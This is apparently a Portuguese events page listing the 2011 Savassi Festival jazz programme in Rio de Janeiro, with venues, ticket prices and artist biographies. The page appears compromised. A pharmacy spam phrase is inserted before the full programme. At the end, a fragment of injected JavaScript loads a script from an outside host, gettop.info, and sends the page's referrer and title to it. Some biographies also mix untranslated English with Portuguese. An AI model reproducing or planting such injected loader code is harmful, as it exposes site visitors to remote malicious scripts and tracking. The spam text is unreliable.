Jazz/BluesProgramaçãoRio de Janeiro

Savassi Festival – Rio

Em sua nona edição, o maior evento de jazz e de música instrumental de Minas Gerais expande suas fronteiras chegando ao Rio de Janeiro, Juiz de Fora e São Paulo.

SERVIÇO
Sala Municipal Baden Powell
Avenida Nossa Senhora de Copacabana, 360
Tel: 2255.1067

Dia 28 de julho– quinta – 20h.

Ingressos a R$ 30,00 / R$ 15,00 (estudantes e idosos)

Chris Potter se apresenta na Sala Baden Powell abrindo o Festival Savassi Rio que este ano se estende ao Rio de Janeiro acompanhado do seu quarteto Underground, composto por Adam Rogers na guitarra, Craig Taborn no Fender Rhodes e Nate Smith na bateria.

O Savassi Festival– Rio se inicia dia 28 com Chris Potter and Underground (EUA) e continua na semana seguinte do dia 03 ao dia 06, com mais atrações internacionais e nacionais distribuídos em quatro espaços da cidade: Sala Baden Powell, TriBOZ, Santo Scenarium e Teatro Odisséia

Chris Potter – saxofone

Um solista de classe mundial, compositor e band, Chris Potter é um dos mais destacados de sua geração. A revista DownBeat afirmou que é “Um dos mais estudados (e copiados) saxofonistas do planeta“, já a Jazz Times identificou-o como “uma figura de renome internacional.” O grande Dave Liebman denominou-o, simplesmente, de “um dos melhores músicos na atual cena“, um sentimento partilhado pelos leitores da DownBeat, que o elegeram, no Reader’s Poll 2008, o segundo melhor sax tenor, atrás apenas de Sonny Rollins.

Um improvisador poderoso, foi o músico mais jovem a ganhar o Prêmio Jazzpar na Dinamarca. Sua impressionante discografia é composta por 15 álbuns como líder e participações em mais de 100 álbuns. Foi indicado para um Grammy por seu trabalho solo em “In Vogue”, uma faixa do disco de Joanne Brackeen,  “Pink Elephant Magic”, de 1999. Aparece com destaque no disco de Steely Dan, “Two Against Nature”, vencedor do Grammy em 2000. Já tocou e gravou os principais nomes do jazz, como Herbie Hancock, Dave Holland, John Scofield, a Mingus Big Band, Jim Hall, Paul Motian, Dave Douglas, Ray Brown e muitos outros.

Desde que despontou na cena Nova Iorquina em 1989 como um prodígio de 18 anos de idade, ao lado do ícone do bebop Red Rodney (que, em sua juventude, acompanhou o lendário Charlie Parker), Potter percorreu um caminho de crescimento estável como instrumentista, compositor e arranjador.

Sua gravação mais recente, “Ultrahang”, é o resultado de cinco anos de trabalho  com o grupo; gravado em janeiro de 2009, após uma extensa turnê, mostra a banda em sua melhor forma, livre e coesa.

fda approved pharmacies PROGRAMAÇÃO COMPLETA

Conhecida pelo samba e chorinho, a capital carioca vai ganhar ares de jazz com atrações internacionais e nacionais dias 28 de julho e 03, 04, 05 e 06 de agosto, datas em que serão realizados shows do Savassi Festival distribuídos entre quatro espaços da cidade: Sala Baden Powell, TribOz, Santo Scenarium e Teatro Odisseia.

Em sua nona edição, o maior e mais prestigiado evento de jazz e de música instrumental de Minas Gerais expande suas fronteiras chegando ao Rio de Janeiro, Juiz de Fora e São Paulo.

O Savassi Festival é um festival de jazz e de música instrumental realizado na rua, em Belo Horizonte. Desde a primeira edição, o evento vem incorporando novas atividades a cada ano como o “Jazz Clube”, shows de jazz em cafés, restaurantes, bares, shoppings e teatros; o “Fotografe o Jazz”, concurso de fotos do evento; “Novos Talentos do Jazz”, concurso para novas bandas de jazz de todo o país para participar do evento principal; “Planejando o Savassi Festival”, seminário de três dias sobre a produção do evento para interessados; e o “Jazzy”, concurso de DJs que tenham sets relacionados com jazz ou música instrumental.

Em Belo Horizonte, na sua nona edição, o festival acontece de 25 de julho a 03 de agosto e neste ano, as novidades são Gravações de CD; a colaboração do Chris Potter com a Orquestra Sinfônica de Minas Gerais, cujo resultado será a premiére internacional do novo trabalho de Chris Potter, o “Dream Tree”; e os shows do Savassi Festival que se expandiram e serão realizados no Rio de Janeiro (dia 28/07 e 03,04,05 e 06/08), em São Paulo e Juiz de Fora.

O concurso de fotografia ‘Fotografe o Jazz’, que premia os melhores registros feitos durante o Savassi Festival também se estende ao Rio de Janeiro. Entre no link e saiba mais.  http://www.savassifestival.com.br/fotografe_jazz
SAVASSI FESTIVAL 2011 – RJ

Na Sala Baden apresentam-se:

– Chris Potter and Underground (EUA) – 28 de julho, quarta, às 20h;

– Cliff Korman Ensemble convida Billy Drewes (EUA) -04 de agosto, quinta, às 20h;

– Kevin Mahogany (EUA) – 05 de agosto, sexta, às 20h;

– Yuri Popov – 06 de agosto, sábado, às 20h.

Sala Baden Powell
Av N. Sra de Copacabana, 360
Informações: (21) 2255 1067
Entrada: R$ 30,00 (inteira), R$15,00 (meia)

No TribOz apresentam-se:

– Omri Mor Trio (Israel) 03 de agosto, quarta, às 21h;

– Quinteto TribOz (Austrália/Brasil) 04 de agosto, quinta, às 21h30;

– Scott Feiner & Pandeiro Jazz (EUA/Brasil) 05 de agosto, sexta, às 21h30;

– Nivaldo Ornelas 06 de agosto, sábado, às 21h30.

TribOz
Rua Conde de Lages, 19, Lapa
Informações: (21) 2210-0366
Couvert artístico: R$20,00

No Santo Scenarium apresentam-se:

– Benny Lackner Trio (EUA) 04 de agosto, quinta, às 18h30;

– Benny Lackner Trio (EUA) 05 de agosto, sexta, às 20h30;

– Benny Lackner Trio (EUA) 06 de agosto, sábado, às 21h30

Santo Scenarium
Rua do Lavradio, 36, Centro
Informações: (21) 3147-9007
Entrada: R$10,00

No Teatro Odisseia apresenta-se:

– Mark Lambert & Orquestra Rádio Swing – 03 de agosto, quarta, às 21h

Teatro Odisséia
Rua Mem de Sá, nº 66. Lapa. Rio de Janeiro.
Telefones: (21) 2224.6367 ou (21) 2266.1014
Entrada: R$ 30,00

PROGRAMAÇÃO CORRIDA

– Dia 28/07- quinta-feira
Chris Potter and Underground (EUA) às 20h – Sala Baden Powell

– Dia 03/08 – quarta-feira
Omri Mor Trio (Israel) às 21h – TribOz
Mark Lambert & Orquestra Rádio Swing – às 21h – Teatro Odisseia

– Dia 04/08 – quinta-feira
Cliff Korman Ensemble convida Billy Drewes (EUA)às 20h –Sala Baden Powell
Quinteto TribOz (Austrália/Brasil) às 21h30 –TribOz
Benny Lackner Trio (EUA) às 18h30 – Santo Scenarium

– Dia 05/08 – sexta-feira
Kevin Mahogany (EUA) às 20h Sala Baden Powell
Scott Feiner & Pandeiro Jazz (EUA/Brasil) às 21h30; TribOz
Benny Lackner Trio (EUA) às 20h30 Santo Scenarium

– Dia 06/08 – sábado
Yuri Popov às 20h. Sala Baden Powell
Nivaldo Ornelas às 21h30 – TribOz
Benny Lackner Trio (EUA) às 21h30 – Santo Scenarium

Um pouco de cada atração

Cliff Korman Ensemble convida Billy Drewes (EUA) 04 de agosto, quinta, às 20h, Sala Baden Powell.

Cliff Korman  é pianista, compositor e arranjador. Pianista completo, educador reconhecido e pesquisador de jazz, música brasileira, e improvisação, Cliff Korman gosta de dizer que 25 anos de imersão no universo musical do Brasil projetaram uma luz diferente na maneira como ele vê o jazz.

Korman estudou com nomes como Roland Hanna, Ron Carter and Kenny Barron, e toca frequentemente em lugares como o Aaron Davis Hall, Birdland e Lincoln Center, e, na Itália, no Festival de Música e Cultura Brasileira Cantar da Costa. Entre os brasileiros, constam Astrud Gilberto, Toninho Horta, além de uma produção a quatro mãos com Wagner Tiso e Milton Nascimento no Festival Internacional de MPB, em S‹o Paulo. Produziu as gravações de “Entre Amigos”, com Rosa Passos e Ron Carter, e “The Feeling's Back” com Chuck Mangione.

Kevin Mahogany (EUA) – 05 de agosto, sexta, às 20h, Sala Baden Powell

Natural de em Kansas City, Missouri, Kevin Mahogany, vocalista de jazz, tornou proeminente na década de 1990. He is known for his scat singing, and his singing style has been compared with jazz singers Joe Williams and Johnny Hartman. Quando Kevin foi para a Baker University, ele tocou com vários conjuntos instrumentais e vocais além de ter sido admitido para ter o seu próprio coro de jazz, enquanto estava na universidade.

Após graduar-se, retornou para sua cidade natal, onde tocou com algumas bandas antes formar dois grupos: “Mahogany”, um cruzamento entre R&B contemporâneo e jazz  e “The Apollos”, uma banda de dança dos anos de 1960 R&B. Ambos os grupos fizeram com que o um grande público visitasse o Kansas para vê-lo tocar. Em fevereiro de 1993, Kevin lançou o álbum “Double Rainbow” recorde de sucesso em lojas. Com baladas raramente ouvidas, músicas de bop e blues obtiveram sucesso instantâneo.

Gravou mais três álbuns, também muito bem recebidos pelo público: “Songs and Moments”, “You got what It takes”, e “Pussy Cat Dues”, com a gravadora Alemã independente “Enja”. Em 1995 Kevin se juntou com a Warner Brothers, e no ano seguinte escreveu seu próprio álbum “Kevin Mahogany”.

Yuri Popov – 06 de agosto, sábado, às 20h, Sala Baden Powell

Yuri Popov é um contrabaixista e ompositor brasileiro. Nascido em Spinoza (MG), foi criado em Montes Claros (MG) e lá estudou no Conservatório Oscar Lorenzo Fernandes. Iniciou sua carreira profissional em 1975, como integrante da Orquestra Sinfônica de Campinas. Participou de várias turnês, shows e gravações com artistas como Beto Guedes, Toninho Horta, Nana Caymmi, Maria Bethânia, João Donato, Leila Pinheiro, Wagner Tiso, Clara Sandroni, Flávio Venturini, Selma Reis e Mauro Senise, entre outros.

De 1986 a 1998, atuou como professor de baixo e arranjo da Universidade Estácio de Sá. Na década de 1990, lançou os CDs “Catopé” (1992) e “Era só começo…” (1999), basicamente autorais. Em 2000, gravou “Cuenda”, trilha sonora do espetáculo homônimo. Lançou, em 2005, o CD “Lua no céu congadeiro”, fruto de dez anos de pesquisas sobre a diversidade musical mineira. Constam da relação de intérpretes de suas composições artistas como Toninho Horta, Clara Sandroni, Mauro Senise e Ana de Hollanda, além de Mark Egan (baixista da banda de Pat Metheny) e do guitarrista coreano Jack Lee.

Omri Mor Trio (Israel) – 03 de agosto, quarta, às 21h, TribOz

O pianista Omri Mor, nascido em 1983, começou a estudar música clássica na Jerusalem Rubin Academy of Music, sob a orientação do Prof. Benjamin Oren e do Dr. Assaf Zohar, e piano jazz com o Prof. Slava Ganelin e com a lenda do saxofone e educador Arnie Lawrance.

O pianista se apresenta freqüentemente em festivais de jazz de Israel e no exterior, e recentemente tem realizado shows com roqueiros israelenses como Berry Sacharof e Micha Shitrit, bem como com artistas étnicos e grupos como Magreb Orchestra (liderada por Nino Biton), a Israeli Andalus Orchestra e músicos como Chaim Look e Lior Elmelich.

O repertório musical de Omri varia da música clássica e ao jazz, passando pela música latina e afro-cubana. Nos últimos anos, ele se tornou profundamente interessado na música andaluz e norte africana, tendo participado de vários projetos com a Magreb Orchestra. Não é de estranhar que o seu som combine elementos de uma grande variedade de estilos e gêneros.

Quinteto TribOz (Austrália/Brasil) – 04 de agosto, quinta, às 21h30, TribOz

É formado por Tomás Improta (piano/teclados), Mike Ryan (trompete/flugel, percussão e voz), Marcelo Padre (saxofones, flauta e percussão), Rodrigo Ferreira (contrabaixo) e Kleberson Caetano (bateria), músicos residentes do clube de jazz do TribOz – Centro Cultural Brasil-Austrália(Lapa, Rio de Janeiro), cujo diretor-fundador é o próprio Mike Ryan.

Individualmente, os integrantes são músicos internacionais e já se apresentaram em diversos festivais pelo mundo. O repertório é composto por músicas próprias influenciadas por uma grande diversidade de estilos musicais, como jazz e world music. As composições, originais e provocantes, servem como palcos para jogos lúdicos, priorizando liberdade para improvisações interativas, a principal característica do quinteto.

A proposta do Quinteto TribOz é criar “novas expressões brasileiras”, apresentando inovações e linguagens rítmicas para desafiar ouvintes que buscam uma experiência diferente. Em contraste à abordagem histórica e tradicional, em que há uma distinção hierárquica entre os solistas de sopro e a seção rítmica, no Quinteto TribOz cada componente pode ser igual contribuinte nesse jogo. O resultado é uma grande brincadeira musical coletiva – inovadora e inesquecível.

Scott Feiner & Pandeiro Jazz (EUA/Brasil) – 05 de agosto, sexta, às 21h30, TribOz

Dono de uma interessante mistura musical, Scott Feiner é um músico incomum. Além de ser um pandeirista norte-americano, que por si só já é raro, conseguiu introduzir o pandeiro no universo do jazz, de um modo bem pessoal e ficou conhecido por seu projeto Pandeiro Jazz, onde criou uma inusitada mistura entre o jazz e o pandeiro brasileiro. Natural de Nova Iorque formou-se em música (Jazz Studies/Guitar) pela Hartt School of Music de Hartford.

Em 1999, em sua primeira visita ao Brasil, Feiner descobriu o pandeiro, instrumento que lhe abriu uma nova dimensão musical, mesmo ainda morando em Nova Iorque. Mudou-se para o Rio de Janeiro em 2001 e em poucos anos tornou-se um pandeirista respeitado no Rio. Ao lado de Rafael Vernet (piano) e Bernardo Ramos (guitarra), dois dos melhores músicos da cena jazzística brasileira atual, apresentará repertório que mistura músicas dos seus três CDs: “Accents” (Zoho), “Dois Mundos” (Biscoito Fino) – indicado pelo Grammy Latino 2009, e “Pandeiro Jazz” (Delira Música), além de outras inéditas.

Nivaldo Ornelas (Brasil) – 06 de agosto, sábado, às 21h30, TribOz

Nivaldo Ornelas é um músico com uma carreira solo e um currículo sólido como sideman, tendo tocado e gravado com artistas do porte de um Gary Peacock, Jack DeJohnette, Egberto Gismonti, Wagner Tiso, Milton Nascimento e muitos outros.  Participou do grupo Som Imaginário com quem gravou seu primeiro álbum “Som Imaginário”. Ornelas trabalhou com Gal Costa, Hermeto Paschoal, Paulo Moura entre outros. Excursionou pelos EUA ao lado de Flora Purim e Airto Moreira e participou do Newport Jazz Festival e do Festival Internacional de Jazz de São Paulo. Com seu primeiro álbum solo, “Portal Dos Anjos” ganhou o prêmio Villa-Lobos como o Melhor Álbum Instrumental do Ano.

Benny Lackner Trio (EUA) – 04 de agosto, quinta, às 18h30; 05 de agosto, sexta, às 20h30; 06 de agosto, sábado, às 21h30 – Santo Scenarium

O Benny Lackner Trio apresenta um jazz expressivo usando a força dos eletrônicos e programação de percussão. Functioning as a collective, with each member interjecting equally toward the construction of their material, the trio's music is unfailingly intricate and multifaceted. Funcionando como um coletivo, com cada membro construindo sua música, o trio é infalivelmente intrincado e multifacetado. While their unique compositions and renditions of jazz standards are remarkably sophisticated and challenging, it is in their unconventional interpretation of contemporary pop hits—by such diverse artists as Prince, Bjork and Jimi Hendrix—that The Benny Lackner Trio reveals its virtuosity.

Embora suas composições originais e interpretações de standards do jazz são notavelmente sofisticada e desafiadora, é na sua interpretação não-convencional de sucessos pop contemporânea de artistas tão diversos como o Prince, Bjork e Jimi Hendrix, que o Benny Lackner Trio revela o seu virtuosismo. Through abstraction these songs become new, untainted works of art, made complete through a marriage of musical traditions, which shake the dust from jazz and bring it into the light, revitalized and emancipated. Através da abstração, essas canções tornaram-se novas, obras de arte não viciada, feita através de uma completa união de tradições musicais, para sacudir a poeira do jazz e trazê-lo para a luz, revitalizado e emancipado.

Mark Lambert & Orquestra Rádio Swing – 03 de agosto, quarta, às 21h, Teatro Odisséia

O cantor/guitarrista/arranjador norte-americano MARK LAMBERT lidera uma nova banda de craques instrumentistas brasileiros, a Orquestra RAdio Swing composta de nove integrantes: dois cantores, quatro na cozinha e quatro sopros. É “filho” do Jump Swing, fusão entre Jazz e Rhythm & Blues. Popularizado nos anos após a Segunda Guerra Mundial por Louis Jordan, Ray Charles e Louis Prima, o gênero junta a espontaneidade do Jazz improvisado com os rítmos dançantes de R&B. Com sucessos como, “Let the Good Times Roll” (Ray Charles), “Caldonia” (Louis Jordan) e “Jump, Jive an’ Wail” (Louis Prima) a Orquestra Radio Swing toca as melhores músicas dançantes do R&B e Soul Americano, além de “I Feel Good”(James Brown) e “Dance To The Music” (Sly & the Family Stone) até um pouco de Tim Maia!

A orquestra é formada por Mark Lambert – voz, guitarra, arranjos, Alma Thomas – voz, Jessé Sadoc  – trompete, Julio Merlino– sax alto, Marcelo Martins – sax tenore, Wanderson Cunha – trombone, Vitor Gonçalves – piano, Jefferson Lescowich – contrabaixo e Renato ‘Massa’ Calmon – bateria

} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.